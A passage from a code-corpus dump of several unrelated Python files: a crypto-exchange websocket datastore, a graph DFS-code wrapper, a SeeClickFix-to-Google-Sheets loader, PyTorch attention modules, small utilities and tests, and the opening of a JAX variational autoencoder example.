            timestamp=parse_datetime(data.get("timestamp")),
        )
    @staticmethod
    def to_trades(data: list[Item]) -> list["Trade"]:
        return [MessageHelper.to_trade(x) for x in data]
    @staticmethod
    def to_trade(data: Item) -> "Trade":
        return Trade(
            price=Decimal(data["price"]),
            side=OrderSide[data["side"]],
            size=Decimal(data["size"]),
            timestamp=parse_datetime(data.get("timestamp")),
            symbol=Symbol[data["symbol"]],
        )
    @staticmethod
    def to_executions(data: list[Item]) -> list["Execution"]:
        return [MessageHelper.to_execution(x) for x in data]
    @staticmethod
    def to_execution(data: Item) -> "Execution":
        return Execution(
            order_id=data["orderId"],
            execution_id=data["executionId"],
            symbol=Symbol[data["symbol"]],
            settle_type=SettleType[data["settleType"]],
            side=OrderSide[data["side"]],
            # accept either key spelling for price/size/timestamp
            price=Decimal(data.get("executionPrice", data.get("price"))),
            size=Decimal(data.get("executionSize", data.get("size"))),
            timestamp=parse_datetime(
                data.get("executionTimestamp", data.get("timestamp"))
            ),
            loss_gain=Decimal(data["lossGain"]),
            fee=Decimal(data["fee"]),
            # properties that only appear in websocket messages
            position_id=data["positionId"] if "positionId" in data else None,
            execution_type=ExecutionType[data["executionType"]]
            if "executionType" in data
            else None,
            order_price=Decimal(data["orderPrice"]) if "orderPrice" in data else None,
            order_size=Decimal(data["orderSize"]) if ("orderSize" in data) else None,
            order_executed_size=Decimal(data["orderExecutedSize"])
            if "orderExecutedSize" in data
            else None,
            order_timestamp=parse_datetime(data["orderTimestamp"])
            if "orderTimestamp" in data
            else None,
            time_in_force=data.get("timeInForce", None),
        )
    @staticmethod
    def to_orders(data: list[Item]) -> list["Order"]:
        return [MessageHelper.to_order(x) for x in data]
    @staticmethod
    def to_order(data: Item) -> "Order":
        status = OrderStatus[data.get("status", data.get("orderStatus"))]
        timestamp = parse_datetime(data.get("orderTimestamp", data.get("timestamp")))
        return Order(
            order_id=data["orderId"],
            symbol=Symbol[data["symbol"]],
            settle_type=SettleType[data["settleType"]],
            execution_type=ExecutionType[data["executionType"]],
            side=OrderSide[data["side"]],
            order_status=status,
            # missing cancelType defaults to CancelType.NONE
            cancel_type=CancelType[data.get("cancelType", CancelType.NONE.name)],
            order_timestamp=timestamp,
            price=Decimal(data.get("price", data.get("orderPrice"))),
            size=Decimal(data.get("size", data.get("orderSize"))),
            executed_size=Decimal(
                data.get("executedSize", data.get("orderExecutedSize"))
            ),
            losscut_price=Decimal(data["losscutPrice"]),
            time_in_force=data["timeInForce"],
        )
    @staticmethod
    def to_positions(data: list[Item]) -> list["Position"]:
        return [MessageHelper.to_position(x) for x in data]
    @staticmethod
    def to_position(data: Item) -> "Position":
        return Position(
            position_id=data["positionId"],
            symbol=Symbol[data["symbol"]],
            side=OrderSide[data["side"]],
            size=Decimal(data["size"]),
            # 'orderdSize' spelling matches the incoming payload key
            orderd_size=Decimal(data["orderdSize"]),
            price=Decimal(data["price"]),
            loss_gain=Decimal(data["lossGain"]),
            leverage=Decimal(data["leverage"]),
            losscut_price=Decimal(data["losscutPrice"]),
            timestamp=parse_datetime(data.get("timestamp")),
        )
    @staticmethod
    def to_position_summaries(data: list[Item]) -> list["PositionSummary"]:
        return [MessageHelper.to_position_summary(x) for x in data]
    @staticmethod
    def to_position_summary(data: Item) -> "PositionSummary":
        return PositionSummary(
            symbol=Symbol[data["symbol"]],
            side=OrderSide[data["side"]],
            average_position_rate=Decimal(data["averagePositionRate"]),
            position_loss_gain=Decimal(data["positionLossGain"]),
            sum_order_quantity=Decimal(data["sumOrderQuantity"]),
            sum_position_quantity=Decimal(data["sumPositionQuantity"]),
            # summary payloads may omit a timestamp; default to now (UTC)
            timestamp=parse_datetime(data.get("timestamp"))
            if data.get("timestamp")
            else datetime.now(timezone.utc),
        )
class GMOCoinDataStore(DataStoreManager):
    """
    DataStore manager for GMO Coin.
    """
    def _init(self) -> None:
        self.create("ticker", datastore_class=TickerStore)
        self.create("orderbooks", datastore_class=OrderBookStore)
        self.create("trades", datastore_class=TradeStore)
        self.create("orders", datastore_class=OrderStore)
        self.create("positions", datastore_class=PositionStore)
        self.create("executions", datastore_class=ExecutionStore)
        self.create("position_summary", datastore_class=PositionSummaryStore)
        # Websocket auth token; populated by initialize() via /private/v1/ws-auth.
        self.token: Optional[str] = None
    async def initialize(self, *aws: Awaitable[aiohttp.ClientResponse]) -> None:
        """
        Seed the stores from awaited REST responses. Supported endpoints:
        - GET /private/v1/latestExecutions (DataStore: executions)
        - GET /private/v1/activeOrders (DataStore: orders)
        - GET /private/v1/openPositions (DataStore: positions)
        - GET /private/v1/positionSummary (DataStore: position_summary)
        - POST /private/v1/ws-auth (Property: token)
        """
        for f in asyncio.as_completed(aws):
            resp = await f
            data = await resp.json()
            if (
                resp.url.path == "/private/v1/latestExecutions"
                and "list" in data["data"]
            ):
                self.executions._onresponse(
                    MessageHelper.to_executions(data["data"]["list"])
                )
            if resp.url.path == "/private/v1/activeOrders" and "list" in data["data"]:
                self.orders._onresponse(MessageHelper.to_orders(data["data"]["list"]))
            if resp.url.path == "/private/v1/openPositions" and "list" in data["data"]:
                self.positions._onresponse(
                    MessageHelper.to_positions(data["data"]["list"])
                )
            if (
                resp.url.path == "/private/v1/positionSummary"
                and "list" in data["data"]
            ):
                self.position_summary._onresponse(
                    MessageHelper.to_position_summaries(data["data"]["list"])
                )
            if resp.url.path == "/private/v1/ws-auth":
                self.token = data["data"]
                # Kick off the background token keep-alive loop.
                # NOTE(review): relies on a private attribute stashed on the
                # response object — confirm against pybotters internals.
                asyncio.create_task(self._token(resp.__dict__['_raw_session']))
    def _onmessage(self, msg: Item, ws: ClientWebSocketResponse) -> None:
        # Dispatch one websocket message to the store matching its channel.
        if "error" in msg:
            logger.warning(msg)
        if "channel" in msg:
            msg_type = MessageType[msg.get("msgType", MessageType.NONE.name)]
            channel: Channel = Channel.from_str(msg["channel"])
            # Public
            if channel == Channel.TICKER:
                self.ticker._onmessage(MessageHelper.to_ticker(msg))
            elif channel == Channel.ORDER_BOOKS:
                self.orderbooks._onmessage(MessageHelper.to_orderbook(msg))
            elif channel == Channel.TRADES:
                self.trades._onmessage(MessageHelper.to_trade(msg))
            # Private
            elif channel == Channel.EXECUTION_EVENTS:
                # an execution both updates the order and records a fill
                self.orders._onexecution(MessageHelper.to_execution(msg))
                self.executions._onmessage(MessageHelper.to_execution(msg))
            elif channel == Channel.ORDER_EVENTS:
                self.orders._onmessage(MessageHelper.to_order(msg))
            elif channel == Channel.POSITION_EVENTS:
                self.positions._onmessage(MessageHelper.to_position(msg), msg_type)
            elif channel == Channel.POSITION_SUMMARY_EVENTS:
                self.position_summary._onmessage(MessageHelper.to_position_summary(msg))
    async def _token(self, session: aiohttp.ClientSession):
        # Re-issue the websocket auth token every 30 minutes for as long
        # as the HTTP session stays open.
        while not session.closed:
            await session.put(
                'https://api.coin.z.com/private/v1/ws-auth',
                data={"token": self.token},
                auth=Auth,
            )
            await asyncio.sleep(1800.0)  # 30 minutes
    @property
    def ticker(self) -> TickerStore:
        return self.get("ticker", TickerStore)
    @property
    def orderbooks(self) -> OrderBookStore:
        return self.get("orderbooks", OrderBookStore)
    @property
    def trades(self) -> TradeStore:
        return self.get("trades", TradeStore)
    @property
    def orders(self) -> OrderStore:
        """
        Active orders only (executed/cancelled orders are removed).
        """
        return self.get("orders", OrderStore)
    @property
    def positions(self) -> PositionStore:
        return self.get("positions", PositionStore)
    @property
    def executions(self) -> ExecutionStore:
        return self.get("executions", ExecutionStore)
    @property
    def position_summary(self) -> PositionSummaryStore:
        return self.get("position_summary", PositionSummaryStore)
| 29.565154 | 88 | 0.589709 |
795bc1c0075613236f7426167d6bcdb8e4af73fc | 1,860 | py | Python | dfscode/dfs_wrapper.py | idea-iitd/graphgen | 0c74511faeed593dcfa7a6c59fc177812232f7d2 | [
"MIT"
] | 34 | 2020-01-23T11:08:02.000Z | 2022-03-02T01:50:04.000Z | dfscode/dfs_wrapper.py | idea-iitd/graphgen | 0c74511faeed593dcfa7a6c59fc177812232f7d2 | [
"MIT"
] | 6 | 2020-02-17T11:22:15.000Z | 2021-12-20T16:35:00.000Z | dfscode/dfs_wrapper.py | idea-iitd/graphgen | 0c74511faeed593dcfa7a6c59fc177812232f7d2 | [
"MIT"
] | 11 | 2020-01-28T08:10:44.000Z | 2022-01-03T20:31:39.000Z | import os
import subprocess
import tempfile
import pickle
import networkx as nx
def get_min_dfscode(G, temp_path=tempfile.gettempdir()):
    """Compute the minimum DFS code of graph *G* via the external ``bin/dfscode`` binary.

    The graph is serialized to a temp file (vertex count, one label per
    vertex with nodes renumbered 0..n-1, edge count, then ``u v label``
    lines), fed to the binary on stdin, and the binary's output file is
    parsed into a list of 5-element lists of strings.

    Note: ``bin/dfscode`` is resolved relative to the current working
    directory, and the default *temp_path* is evaluated once at import time.
    """
    input_fd, input_path = tempfile.mkstemp(dir=temp_path)
    with open(input_path, 'w') as f:
        # vertex count, then one label line per vertex
        vcount = len(G.nodes)
        f.write(str(vcount) + '\n')
        i = 0
        d = {}  # maps original node ids to consecutive integers 0..n-1
        for x in G.nodes:
            d[x] = i
            i += 1
            f.write(str(G.nodes[x]['label']) + '\n')
        # edge count, then one "u v label" line per edge
        ecount = len(G.edges)
        f.write(str(ecount) + '\n')
        for (u, v) in G.edges:
            f.write(str(d[u]) + ' ' + str(d[v]) +
                    ' ' + str(G[u][v]['label']) + '\n')
    output_fd, output_path = tempfile.mkstemp(dir=temp_path)
    dfscode_bin_path = 'bin/dfscode'
    with open(input_path, 'r') as f:
        subprocess.call([dfscode_bin_path, output_path, '2'], stdin=f)
    with open(output_path, 'r') as dfsfile:
        dfs_sequence = []
        for row in dfsfile.readlines():
            splited_row = row.split()
            # keep tokens at odd indices — the output appears to alternate
            # tag/value pairs; TODO confirm against the dfscode binary format
            splited_row = [splited_row[2 * i + 1] for i in range(5)]
            dfs_sequence.append(splited_row)
    # close the mkstemp descriptors and best-effort remove the temp files
    os.close(input_fd)
    os.close(output_fd)
    try:
        os.remove(input_path)
        os.remove(output_path)
    except OSError:
        pass
    return dfs_sequence
def graph_from_dfscode(dfscode):
    """Rebuild a labeled undirected graph from a DFS-code edge list.

    Each entry is ``(from, to, from_label, edge_label, to_label)``; node ids
    are converted to int and labels attached as ``label`` attributes.
    """
    result = nx.Graph()
    for src, dst, src_label, edge_label, dst_label in dfscode:
        u, v = int(src), int(dst)
        result.add_node(u, label=src_label)
        result.add_node(v, label=dst_label)
        result.add_edge(u, v, label=edge_label)
    return result
if __name__ == '__main__':
    # Smoke test: load one pickled ENZYMES graph and print its minimum DFS code.
    with open(os.path.expanduser('~/MTP/data/dataset/ENZYMES/graphs/graph180.dat'), 'rb') as f:
        G = pickle.load(f)
    dfs_code = get_min_dfscode(G)
    # A DFS code has one entry per edge, so these two counts should match.
    print(len(dfs_code), G.number_of_edges())
    for code in dfs_code:
        print(code)
795bc1e2cafc3234b0c2086c3007a26be50b8cbe | 4,194 | py | Python | SCF.py | datala/seeClickFix-loader | 884bae2cb3c4585d69f9420ce68a843f4665d121 | [
"Apache-2.0"
] | null | null | null | SCF.py | datala/seeClickFix-loader | 884bae2cb3c4585d69f9420ce68a843f4665d121 | [
"Apache-2.0"
] | null | null | null | SCF.py | datala/seeClickFix-loader | 884bae2cb3c4585d69f9420ce68a843f4665d121 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 3 11:23:21 2017
@author: Cerina
"""
#import json
import sys
import requests
import gspread
from oauth2client.service_account import ServiceAccountCredentials
# Google Sheets OAuth2 setup: service-account credentials from a local JSON key.
scope = "https://spreadsheets.google.com/feeds"
credentials = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
gs = gspread.authorize(credentials)
# CLI args: the year to pull SeeClickFix requests for, and the spreadsheet name.
year = sys.argv[1]
sheetName = sys.argv[2]
mySheet = gs.open(sheetName).sheet1
# Reset the sheet to a single empty header row before loading fresh data.
mySheet.clear()
mySheet.resize(1, 26)
def loadPage(page):
    """Fetch one page of SeeClickFix Open311 requests for ``year`` and append
    any records not already present to the Google Sheet.

    Returns 0 when the API returns an empty page (no more data), 1 otherwise,
    so the caller can keep paging until exhaustion.
    """
    aPage = str(page)
    # Open311 endpoint for place 670, windowed to [year, year+1), 100 rows/page.
    rstring = 'https://seeclickfix.com/open311/v2/670/requests.json?start_date=' + \
        str(year) + '-01-01T00:00:00Z&end_date=' + str(int(year) + 1) + \
        '-01-01T00:00:00Z&page=' + aPage + '&per_page=100'
    r = requests.get(rstring)
    if len(r.json()) == 0:
        return 0
    else:
        #sheet_data is a list of dictionaries
        sheet_data = r.json()
        #sheet_data = sorted(sheet_data, key = lambda k: k["service_request_id"])
        #header_list is list of cell objects
        columnnumber = 0
        header_list = mySheet.range(1, 1, 1, len(r.json()[0]))
        # Write the JSON keys of the first record as the header row.
        # NOTE(review): this relies on dict key order matching .values() order
        # below — guaranteed on Python 3.7+; confirm the runtime version.
        for i in r.json()[0].keys():
            header_list[columnnumber].value = i
            columnnumber += 1
        newSheetStartIndex = 0
        #If spreadsheet is has empty first row
        if mySheet.get_all_values() == []:
            oldSheet = []
        #If spreadsheet has data--
        #1. Sheet has headers plus value data
        elif len(mySheet.get_all_records()) != 0:
            #make a list of dictionary of all the records
            oldSheet = mySheet.get_all_records()
            #Look at the last "requested_datetime" value
            # NOTE(review): indexing by mySheet.row_count - 2 assumes the
            # sheet's row count equals len(oldSheet) + header row; trailing
            # blank rows would make this raise IndexError — verify.
            last_id = oldSheet[mySheet.row_count -2]["service_request_id"]
            last_rowNum_oldSheet = len(oldSheet) + 1
            #Look at each row in sheet_data, keeping track of the row number.
            #If sheet_data's "requested_timedate" field matches last_time, split sheet_data
            #at that row and update sheet_data
            if len(sheet_data) != 0:
                for i in range(len(sheet_data)):
                    if last_id == sheet_data[i]["service_request_id"]:
                        newSheetStartIndex = i + 1
        #2. Sheet only has header, no data
        else:
            oldSheet = []
        # Drop records already present in the sheet.
        sheet_data = sheet_data[newSheetStartIndex:]
        sheet_data_vals = []
        #sheet_data_vals is a list of lists
        for i in range(len(sheet_data)):
            sheet_data_vals.append(list(sheet_data[i].values()))
        #Resize google sheet to fit the data, including a row for the headers
        mySheet.resize(len(oldSheet + sheet_data_vals)+1, mySheet.col_count)
        #cell_matrix is a list of cell objects
        cell_matrix = []
        cell_matrix = cell_matrix + header_list
        #Make rownumber reflective of the newest row
        rownumber = len(oldSheet) + 2
        #Each row in sheet_data represents a list, where each list holds the values
        for row in sheet_data_vals:
            #cellrange = 'A{row}:{letter}{row}'.format(row=rownumber, letter=chr(len(row) + ord('a') - 1))
            # get the row from the worksheet
            #cell_list is list of cell objects
            cell_list = mySheet.range(rownumber, 1, rownumber, len(sheet_data_vals[0]))
            columnnumber = 0
            #cell represents individual value from the row list
            for cell in row:
                #cell_list updated with values from row
                cell_list[columnnumber].value = row[columnnumber]
                columnnumber += 1
            # add the cell_list, which represents all cells in a row to the full matrix
            cell_matrix = cell_matrix + cell_list
            rownumber += 1
        # output the full matrix all at once to the worksheet.
        mySheet.update_cells(cell_matrix)
        return 1
# Page through the API until loadPage reports an empty page (returns 0).
thisPage = 1
while loadPage(thisPage) != 0:
    thisPage += 1
| 32.765625 | 106 | 0.58846 |
795bc2575bea2a594325c327430619f3f7d8149b | 5,496 | py | Python | model/attention.py | nSamsow/CSNLN | 309c7451828c8878b85577ee78d4ecd465c045f0 | [
"MIT"
] | null | null | null | model/attention.py | nSamsow/CSNLN | 309c7451828c8878b85577ee78d4ecd465c045f0 | [
"MIT"
] | null | null | null | model/attention.py | nSamsow/CSNLN | 309c7451828c8878b85577ee78d4ecd465c045f0 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils import spectral_norm as spectral_norm_fn
from torch.nn.utils import weight_norm as weight_norm_fn
from PIL import Image
from torchvision import transforms
from torchvision import utils as vutils
from model import common
from model.utils.tools import extract_image_patches,\
reduce_mean, reduce_sum, same_padding
#in-scale non-local attention
class NonLocalAttention(nn.Module):
    """In-scale non-local attention: every spatial position attends to all
    other positions of the same feature map."""

    def __init__(self, channel=128, reduction=2, ksize=3, scale=3, stride=1, softmax_scale=10, average=True, conv=common.default_conv):
        super(NonLocalAttention, self).__init__()
        # Two reduced-channel embeddings for the similarity score, plus a
        # full-channel embedding for the values being aggregated.
        self.conv_match1 = common.BasicBlock(conv, channel, channel // reduction, 1, bn=False, act=nn.PReLU())
        self.conv_match2 = common.BasicBlock(conv, channel, channel // reduction, 1, bn=False, act=nn.PReLU())
        self.conv_assembly = common.BasicBlock(conv, channel, channel, 1, bn=False, act=nn.PReLU())

    def forward(self, input):
        query = self.conv_match1(input)
        key = self.conv_match2(input)
        value = self.conv_assembly(input)

        n, c, h, w = query.shape
        # Flatten spatial dims: query (N, HW, C), key (N, C, HW).
        query = query.permute(0, 2, 3, 1).view((n, h * w, c))
        key = key.view(n, c, h * w)
        attention = F.softmax(torch.matmul(query, key), dim=2)

        # Aggregate values with the attention weights and restore (N, C, H, W).
        value = value.view(n, -1, h * w).permute(0, 2, 1)
        out = torch.matmul(attention, value)
        return out.permute(0, 2, 1).view(n, -1, h, w)
#cross-scale non-local attention
class CrossScaleAttention(nn.Module):
    """Cross-scale non-local attention: matches the input against a
    1/scale downsampled copy of itself and reconstructs at full resolution
    by transposed convolution with the matched full-resolution patches."""
    def __init__(self, channel=128, reduction=2, ksize=3, scale=3, stride=1, softmax_scale=10, average=True, conv=common.default_conv):
        super(CrossScaleAttention, self).__init__()
        self.ksize = ksize
        self.stride = stride
        self.softmax_scale = softmax_scale
        self.scale = scale
        self.average = average
        # Small constant guarding the patch-norm division below.
        escape_NaN = torch.FloatTensor([1e-4])
        self.register_buffer('escape_NaN', escape_NaN)
        self.conv_match_1 = common.BasicBlock(conv, channel, channel//reduction, 1, bn=False, act=nn.PReLU())
        self.conv_match_2 = common.BasicBlock(conv, channel, channel//reduction, 1, bn=False, act=nn.PReLU())
        self.conv_assembly = common.BasicBlock(conv, channel, channel, 1, bn=False, act=nn.PReLU())
        #self.register_buffer('fuse_weight', fuse_weight)
    def forward(self, input):
        #get embedding
        embed_w = self.conv_assembly(input)
        match_input = self.conv_match_1(input)
        # b*c*h*w
        shape_input = list(embed_w.size())   # b*c*h*w
        input_groups = torch.split(match_input,1,dim=0)
        # kernel size on input for matching
        kernel = self.scale*self.ksize
        # raw_w is extracted for reconstruction
        raw_w = extract_image_patches(embed_w, ksizes=[kernel, kernel],
                                      strides=[self.stride*self.scale,self.stride*self.scale],
                                      rates=[1, 1],
                                      padding='same') # [N, C*k*k, L]
        # raw_shape: [N, C, k, k, L]
        raw_w = raw_w.view(shape_input[0], shape_input[1], kernel, kernel, -1)
        raw_w = raw_w.permute(0, 4, 1, 2, 3)    # raw_shape: [N, L, C, k, k]
        raw_w_groups = torch.split(raw_w, 1, dim=0)
        # downscaling X to form Y for cross-scale matching
        ref  = F.interpolate(input, scale_factor=1./self.scale, mode='bilinear')
        ref = self.conv_match_2(ref)
        w = extract_image_patches(ref, ksizes=[self.ksize, self.ksize],
                                  strides=[self.stride, self.stride],
                                  rates=[1, 1],
                                  padding='same')
        shape_ref = ref.shape
        # w shape: [N, C, k, k, L]
        w = w.view(shape_ref[0], shape_ref[1], self.ksize, self.ksize, -1)
        w = w.permute(0, 4, 1, 2, 3)    # w shape: [N, L, C, k, k]
        w_groups = torch.split(w, 1, dim=0)
        y = []
        scale = self.softmax_scale
        # 1*1*k*k
        #fuse_weight = self.fuse_weight
        # Process each batch element independently: downsampled patches act
        # as correlation filters against the (padded) input.
        for xi, wi, raw_wi in zip(input_groups, w_groups, raw_w_groups):
            # normalize
            wi = wi[0]  # [L, C, k, k]
            max_wi = torch.max(torch.sqrt(reduce_sum(torch.pow(wi, 2),
                                                     axis=[1, 2, 3],
                                                     keepdim=True)),
                               self.escape_NaN)
            wi_normed = wi/ max_wi
            # Compute correlation map
            xi = same_padding(xi, [self.ksize, self.ksize], [1, 1], [1, 1])  # xi: 1*c*H*W
            yi = F.conv2d(xi, wi_normed, stride=1)   # [1, L, H, W] L = shape_ref[2]*shape_ref[3]
            yi = yi.view(1,shape_ref[2] * shape_ref[3], shape_input[2], shape_input[3]) # (B=1, C=32*32, H=32, W=32)
            # rescale matching score
            yi = F.softmax(yi*scale, dim=1)
            if self.average == False:
                # Hard attention: keep only the best match per position.
                yi = (yi == yi.max(dim=1,keepdim=True)[0]).float()
            # deconv for reconsturction
            wi_center = raw_wi[0]
            yi = F.conv_transpose2d(yi, wi_center, stride=self.stride*self.scale, padding=self.scale)
            # NOTE(review): the constant 6 presumably averages overlapping
            # transposed-conv contributions for the default scale/ksize —
            # confirm for other configurations.
            yi =yi/6.
            y.append(yi)
        y = torch.cat(y, dim=0)
        return y
| 44.682927 | 135 | 0.579148 |
795bc2dab06dfadbd8b2fe39743610e9164efa96 | 475 | py | Python | missingnumberinarray.py | idvipul1999/Microsoft_GeeksforGeeks | 9e294f3beb986bf9eae00e22a3599551b4808008 | [
"MIT"
] | null | null | null | missingnumberinarray.py | idvipul1999/Microsoft_GeeksforGeeks | 9e294f3beb986bf9eae00e22a3599551b4808008 | [
"MIT"
] | null | null | null | missingnumberinarray.py | idvipul1999/Microsoft_GeeksforGeeks | 9e294f3beb986bf9eae00e22a3599551b4808008 | [
"MIT"
] | null | null | null | import math
import os
import random
import re
import sys
def missing(arr, n=None):
    """Return the missing value from ``arr``, which holds n-1 distinct
    numbers of the run 1..n (the classic "missing number in array" problem).

    ``n`` is the intended size of the full run; if omitted it is inferred
    as ``len(arr) + 1``.  The sum formula also finds a missing first or
    last element, which the original adjacent-gap scan could not, and it
    accepts the two-argument call used by the driver script below.
    """
    if n is None:
        n = len(arr) + 1
    # Sum of 1..n minus the actual sum is exactly the absent value.
    return n * (n + 1) // 2 - sum(arr)
# Driver: read t test cases; each case gives n followed by the n-1 present
# numbers on one line.  Fixes the original's SyntaxError ``[:(n-)]`` (now
# ``[:(n - 1)]``) and its two-argument call to the one-parameter missing().
t = int(input())
arr = []
for j in range(0, t):
    n = int(input())
    list1 = list(map(int, input().split()[:(n - 1)]))
    result = missing(list1)
    arr.append(result)
# Print all answers after reading all input, as before.
for i in range(0, t):
    print(arr[i])
795bc47aa9a4335e893a22643bfb4e5b5772170f | 1,201 | py | Python | import_savedmodel_to_tfb.py | yhwang/tf-utility | 728f42fa7b3e1b8bbcaf5e9514267f7b8b298e16 | [
"Apache-2.0"
] | null | null | null | import_savedmodel_to_tfb.py | yhwang/tf-utility | 728f42fa7b3e1b8bbcaf5e9514267f7b8b298e16 | [
"Apache-2.0"
] | null | null | null | import_savedmodel_to_tfb.py | yhwang/tf-utility | 728f42fa7b3e1b8bbcaf5e9514267f7b8b298e16 | [
"Apache-2.0"
] | null | null | null | import sys
import argparse
import tensorflow as tf
from tensorflow.python.platform import app
from tensorflow.python.summary import summary
def import_to_tensorboard(savedmodel_dir, tag, log_dir):
    """Load a SavedModel graph and export it as a TensorBoard event log.

    Args:
        savedmodel_dir: directory containing the SavedModel.
        tag: meta-graph tag to load.
        log_dir: destination directory for the TensorBoard log.
    """
    graph = tf.Graph()
    with tf.Session(graph=graph) as sess:
        tf.saved_model.loader.load(sess, [tag], savedmodel_dir)
        writer = summary.FileWriter(log_dir)
        writer.add_graph(sess.graph)
        print("Start the tensorboard by:"
              "tensorboard --logdir={}".format(log_dir))
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Convert savedmodel to tensorboard log')
    # nargs=1 makes each argument a one-element list, hence the [0] below.
    parser.add_argument('--savedmodel_dir', type=str, nargs=1,
                        help='SavedModel directory')
    parser.add_argument('--tag', nargs=1, default=[tf.saved_model.tag_constants.SERVING],
                        help='SavedModel tag')
    parser.add_argument('--log_dir', nargs=1, type=str, help='tensorbloard log dir')
    args = parser.parse_args()
    import_to_tensorboard(args.savedmodel_dir[0], args.tag[0], args.log_dir[0])
| 33.361111 | 87 | 0.713572 |
795bc4868c8b92eefcaa2f621e2c1f89a8c7eacc | 2,273 | py | Python | tests/transformers/map_keys_test.py | santunioni/transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | 1 | 2022-02-21T22:15:08.000Z | 2022-02-21T22:15:08.000Z | tests/transformers/map_keys_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | tests/transformers/map_keys_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | import pytest
from resources import credito
from transformer.transformers.map_keys import MapKeys, MapKeysConfig
@pytest.fixture
def metadata_credito():
    # Pipeline metadata used to resolve "@{origin}" / "@{type}" placeholders.
    return {"type": "deal", "origin": "pipedrive"}
@pytest.fixture(scope="session")
def target_data():
    # Expected mapped output for the credito payload (built once per session).
    return credito.target_data()
@pytest.fixture(scope="session")
def mapping():
    # Flat key mapping for the credito payload (built once per session).
    return credito.mapping()
@pytest.fixture
def nested_mapping():
    # Source-to-target key mapping; dotted paths address nested dicts,
    # "$[i]" addresses list indices, and "@{name}" placeholders are filled
    # from the metadata fixture.
    return {
        "id": "@{origin}_@{type}_id",
        "cliente.dados_bancarios.$[0].digito_agencia": "bank_data.$[0].agency_digit",
        "cliente.dados_bancarios.$[0].digito_conta": "bank_data.$[0].account_digit",
        "cliente.dados_bancarios.$[0].tipo_conta": "bank_data.$[0].account_type",
        "cliente.cpf": "client.cpf",
        "cliente.email": "client.email",
        "cliente.nome": "name",
        "operacoes_credito.$[0].condicao_credito.despesas.$[0].codigo": "bank_data.$[0].credit_operations.$[0].expenses_code",  # noqa
        "operacoes_credito.$[0].condicao_credito.valor_solicitado": "bank_data.$[0].credit_operations.$[0].valor_solicitado",  # noqa
    }
@pytest.fixture
def nested_target_data():
    # Expected nested output of applying nested_mapping to the credito
    # payload with preserve_unmapped=False.
    return {
        "pipedrive_deal_id": 1645687,
        "client": {
            "cpf": "99915697902",
            "email": "marliaparecidaanadasneves-77@mail.com",
        },
        "name": "Marli Aparecida Ana das Neves",
        "bank_data": [
            {
                "agency_digit": "4",
                "account_digit": "1",
                "account_type": "CONTA_CORRENTE_INDIVIDUAL",
                "credit_operations": [
                    {"expenses_code": 1234, "valor_solicitado": 4117.48}
                ],
            }
        ],
    }
def test_mapped_dict(credito_payload, metadata_credito, target_data, mapping):
    # Unmapped source keys must be dropped when preserve_unmapped=False.
    mapper = MapKeys(config=MapKeysConfig(mapping=mapping, preserve_unmapped=False))
    assert mapper.transform(credito_payload, metadata_credito)[0] == target_data
def test_unflatted_dict(
    nested_mapping, nested_target_data, credito_payload, metadata_credito
):
    # Dotted / "$[i]" target keys must be expanded into nested dicts/lists.
    mapper = MapKeys(
        config=MapKeysConfig(mapping=nested_mapping, preserve_unmapped=False)
    )
    actual = mapper.transform(credito_payload, metadata_credito)[0]
    assert nested_target_data == actual
| 31.569444 | 134 | 0.648922 |
795bc4aebc7e52e17fbc251ac32cec56aeac1336 | 5,033 | py | Python | examples/mnist_vae.py | joshuagornall/jax | c97cd0a526c12ad81988fd58c1c66df4ddd71813 | [
"ECL-2.0",
"Apache-2.0"
] | 17,375 | 2018-11-18T02:15:55.000Z | 2022-03-31T23:49:46.000Z | examples/mnist_vae.py | joshuagornall/jax | c97cd0a526c12ad81988fd58c1c66df4ddd71813 | [
"ECL-2.0",
"Apache-2.0"
] | 5,018 | 2018-11-22T17:04:07.000Z | 2022-03-31T23:36:25.000Z | examples/mnist_vae.py | joshuagornall/jax | c97cd0a526c12ad81988fd58c1c66df4ddd71813 | [
"ECL-2.0",
"Apache-2.0"
] | 1,805 | 2018-11-21T10:13:53.000Z | 2022-03-31T23:49:19.000Z | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A basic variational autoencoder (VAE) on binarized MNIST using Numpy and JAX.
This file uses the stax network definition library and the optimizers
optimization library.
"""
import os
import time
import matplotlib.pyplot as plt
import jax
import jax.numpy as jnp
from jax import jit, grad, lax, random
from jax.experimental import optimizers
from jax.experimental import stax
from jax.experimental.stax import Dense, FanOut, Relu, Softplus
from examples import datasets
def gaussian_kl(mu, sigmasq):
  """KL divergence KL(N(mu, diag(sigmasq)) || N(0, I)), summed over elements."""
  per_dim = 1. + jnp.log(sigmasq) - mu**2. - sigmasq
  return -0.5 * jnp.sum(per_dim)
def gaussian_sample(rng, mu, sigmasq):
  """Reparameterized sample from the diagonal Gaussian N(mu, diag(sigmasq))."""
  eps = random.normal(rng, mu.shape)
  return mu + jnp.sqrt(sigmasq) * eps
def bernoulli_logpdf(logits, x):
  """Summed Bernoulli log pdf of binary data ``x`` given ``logits``."""
  # logaddexp(0, -+logit) is the numerically stable softplus form of the
  # per-element negative log-likelihood; the sign flips with x.
  sign = jnp.where(x, -1., 1.)
  return -jnp.sum(jnp.logaddexp(0., sign * logits))
def elbo(rng, params, images):
  """One-sample Monte Carlo estimate of the negative evidence lower bound."""
  enc_params, dec_params = params
  mu_z, sigmasq_z = encode(enc_params, images)
  latent = gaussian_sample(rng, mu_z, sigmasq_z)
  logits_x = decode(dec_params, latent)
  # Reconstruction log-likelihood minus the KL regularizer.
  return bernoulli_logpdf(logits_x, images) - gaussian_kl(mu_z, sigmasq_z)
def image_sample(rng, params, nrow, ncol):
  """Sample an nrow x ncol grid of images from the generative model."""
